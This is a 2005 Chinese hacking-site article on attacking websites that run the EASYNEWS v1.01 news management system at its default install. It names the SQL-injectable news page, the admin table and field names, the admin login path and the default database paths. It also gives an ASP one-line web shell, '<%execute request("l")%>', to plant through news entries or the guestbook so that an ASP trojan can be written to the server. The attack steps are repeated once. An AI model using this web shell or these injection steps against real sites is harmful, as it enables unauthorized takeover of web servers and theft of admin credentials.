新手入门入侵实例工具使用安全防范黑客人物软件破解漏洞研究
作者:RHU-TAC编辑员 来自:RHU网络编辑 时间:2005-3-2 双击滚屏 收藏本页 字体:大 中 小
点击 查看RHU2004全年文章
EASYNEWS新闻管理系统 v1.01 正式版”是在企业网站中比较常见的一套模版,最近下载了一套来看,暂时还未发现漏洞(本人水平很矮!),但发现如果网站是默认路径和默认文件名安装的话,也有很大的安全隐患!(实际上在本人测试的N个使用该管理系统的网站中,90%默认安装) 1、SQL注入。随便打开一个新闻,即可注入,表名admin,字段名adminuid、adminpwd,后台/admin/index.asp。进入后台后,由于默认的数据库后缀是asp,所以可以在“添加新闻”或“修改新闻”中插入“一句话木马”的代码: <%execute request("l")%> 然后用木马客户端连接,即可写入一个asp木马。这里的默认数据库是\admin\db\news.asp。 2、留言本利用。由于留言本的默认数据库也是asp的,所以也可以用“一句话木马”来写入一个asp木马。留言本的默认数据库是\ebook\db\ebook.asp。
1、SQL注入。随便打开一个新闻,即可注入,表名admin,字段名adminuid、adminpwd,后台/admin/index.asp。进入后台后,由于默认的数据库后缀是asp,所以可以在“添加新闻”或“修改新闻”中插入“一句话木马”的代码:
<%execute request("l")%> 然后用木马客户端连接,即可写入一个asp木马。这里的默认数据库是\admin\db\news.asp。
2、留言本利用。由于留言本的默认数据库也是asp的,所以也可以用“一句话木马”来写入一个asp木马。留言本的默认数据库是\ebook\db\ebook.asp。
OVER
